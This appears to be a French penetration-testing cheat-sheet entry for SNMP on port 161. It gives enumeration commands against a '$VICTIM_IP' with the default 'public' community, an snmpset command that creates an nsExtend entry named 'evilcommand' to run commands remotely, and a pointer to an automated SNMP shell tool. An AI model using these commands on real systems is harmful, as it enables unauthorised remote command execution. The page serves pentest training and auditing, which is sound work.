161 - SNMP

Prérequis

Pour exécuter les commandes suivantes, il est recommandé d’installer le paquet snmp-mibs-downloader:

apt install -y snmp-mibs-downloader

Lister les informations d’une machine

onesixtyone $VICTIM_RANGE public
snmpwalk -c public -v1 -t 10 $VICTIM_IP

SNMP RCE

La table nsExtendObjects permet de créer des scripts custom pouvant être consultés via SNMP. Il est possible de lister les scripts à l’aide de la commande suivantes:

snmpwalk -v2c -c public $VICTIM_IP NET-SNMP-EXTEND-MIB::nsExtendObjects

Si l’utilisateur a accès en écriture à SNMP, il peut créer ses propres scripts à distance:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c $COMUNITY $VICTIM_IP \
'nsExtendStatus."evilcommand"' = createAndGo \
'nsExtendCommand."evilcommand"' = /bin/echo \
'nsExtendArgs."evilcommand"' = 'hello world'

Tip

Il est possible d’automatiser l’exploitation de cette attaque avec l’outil SNMP Shell.

python shell.py $VICTIM_IP -c $COMUNITY

Ressources :

https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/6/html/deployment_guide/sect-system_monitoring_tools-net-snmp-extending#sect-System_Monitoring_Tools-Net-SNMP-Extending-Shell